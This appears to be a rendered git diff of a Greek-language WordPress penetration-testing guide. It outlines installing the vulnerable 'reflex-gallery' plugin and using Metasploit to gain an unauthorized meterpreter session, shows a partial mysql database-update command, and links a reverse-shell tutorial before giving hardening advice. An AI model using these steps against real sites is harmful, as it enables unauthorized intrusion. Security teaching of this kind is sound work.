* Πλοηγηθείτε στον πίνακα ελέγχου του WordPress, στη συνέχεια πηγαίνετε σε `Πίνακας Ελέγχου > Πρόσθετα > Μεταφόρτωση Προσθέτου`.
|
||||
* Μεταφορτώστε το αρχείο zip του προσθέτου που κατεβάσατε.
|
||||
3. **Ενεργοποίηση Προσθέτου**: Αφού εγκατασταθεί με επιτυχία το πρόσθετο, πρέπει να ενεργοποιηθεί μέσω του πίνακα ελέγχου.
|
||||
3. **Ενεργοποίηση Προσθέτου**: Μόλις εγκατασταθεί με επιτυχία το πρόσθετο, πρέπει να ενεργοποιηθεί μέσω του πίνακα ελέγχου.
|
||||
4. **Εκμετάλλευση**:
|
||||
* Με το πρόσθετο "reflex-gallery" εγκατεστημένο και ενεργοποιημένο, μπορεί να εκμεταλλευτεί καθώς είναι γνωστό ότι είναι ευάλωτο.
|
||||
* Το πλαίσιο Metasploit παρέχει ένα εκμεταλλεύσιμο για αυτήν την ευπάθεια. Φορτώνοντας το κατάλληλο module και εκτελώντας συγκεκριμένες εντολές, μπορεί να δημιουργηθεί μια συνεδρία meterpreter, παρέχοντας μη εξουσιοδοτημένη πρόσβαση στον ιστότοπο.
|
||||
* Σημειώνεται ότι αυτή είναι μόνο μία από τις πολλές μεθόδους για την εκμετάλλευση ενός ιστότοπου WordPress.
|
||||
* Το πλαίσιο Metasploit παρέχει ένα εκμεταλλεύσιμο για αυτήν την ευπάθεια. Με τη φόρτωση του κατάλληλου μοντέλου και την εκτέλεση συγκεκριμένων εντολών, μπορεί να δημιουργηθεί μια συνεδρία meterpreter, παρέχοντας μη εξουσιοδοτημένη πρόσβαση στην ιστοσελίδα.
|
||||
* Σημειώνεται ότι αυτή είναι μόνο μία από τις πολλές μεθόδους για την εκμετάλλευση μιας ιστοσελίδας WordPress.
|
||||
|
||||
Το περιεχόμενο περιλαμβάνει οπτικά βοηθήματα που απεικονίζουν τα βήματα στον πίνακα ελέγχου του WordPress για την εγκατάσταση και ενεργοποίηση του προσθέτου. Ωστόσο, είναι σημαντικό να σημειωθεί ότι η εκμετάλλευση ευπαθειών με αυτόν τον τρόπο είναι παράνομη και αναθέτεται χωρίς κατάλληλη εξουσιοδότηση. Αυτές οι πληροφορίες πρέπει να χρησιμοποιούνται υπεύθυνα και μόνο σε νόμιμο πλαίσιο, όπως ο έλεγχος διείσδυσης με ρητή άδεια.
|
||||
Το περιεχόμενο περιλαμβάνει οπτικά βοηθήματα που απεικονίζουν τα βήματα στον πίνακα ελέγχου του WordPress για την εγκατάσταση και ενεργοποίηση του προσθέτου. Ωστόσο, είναι σημαντικό να σημειωθεί ότι η εκμετάλλευση ευπαθειών με αυτόν τον τρόπο είναι παράνομη και αναθέτεται χωρίς κατάλληλη εξουσιοδότηση. Αυτές οι πληροφορίες πρέπει να χρησιμοποιούνται υπεύθυνα και μόνο σε νόμιμο πλαίσιο, όπως η δοκιμή διείσδυσης με ρητή άδεια.
|
||||
|
||||
**Για περισσότερες λεπτομερείς οδηγίες ελέγξτε:** [**https://www.hackingarticles.in/wordpress-reverse-shell/\*\***](https://www.hackingarticles.in/wordpress-reverse-shell/)
|
||||
|
||||
|
@ -370,7 +372,7 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE
|
|||
|
||||
### Τακτικές Ενημερώσεις
|
||||
|
||||
Βεβαιωθείτε ότι το WordPress, τα πρόσθετα και τα θέματα είναι ενημερωμένα. Επιβεβαιώστε επίσης ότι η αυτόματη ενημέρωση είναι ενεργοποιημένη στο αρχείο wp-config.php:
|
||||
Βεβαιωθείτε ότι το WordPress, τα πρόσθετα και τα θέματα είναι ενημερωμένα. Επίσης, επιβεβαιώστε ότι η αυτόματη ενημέρωση είναι ενεργοποιημένη στο αρχείο wp-config.php:
|
||||
```bash
|
||||
define( 'WP_AUTO_UPDATE_CORE', true );
|
||||
add_filter( 'auto_update_plugin', '__return_true' );
|
||||
|
@ -388,11 +390,11 @@ add_filter( 'auto_update_theme', '__return_true' );
|
|||
|
||||
* Αφαιρέστε τον προεπιλεγμένο χρήστη **admin**
|
||||
* Χρησιμοποιήστε **ισχυρούς κωδικούς πρόσβασης** και **2FA**
|
||||
* Ελέγξτε περιοδικά τα **δικαιώματα** των χρηστών
|
||||
* Ελέγξτε τακτικά τα **δικαιώματα** των χρηστών
|
||||
* **Περιορίστε τις προσπάθειες σύνδεσης** για να αποτρέψετε επιθέσεις Brute Force
|
||||
* Μετονομάστε το αρχείο **`wp-admin.php`** και επιτρέψτε την πρόσβαση μόνο εσωτερικά ή από συγκεκριμένες διευθύνσεις IP.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Χρησιμοποιήστε το [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) για να δημιουργήσετε εύκολα και να **αυτοματοποιήσετε ροές εργασίας** με τα πιο προηγμένα εργαλεία κοινότητας στον κόσμο.\
|
||||
|
|
Loading…
Reference in a new issue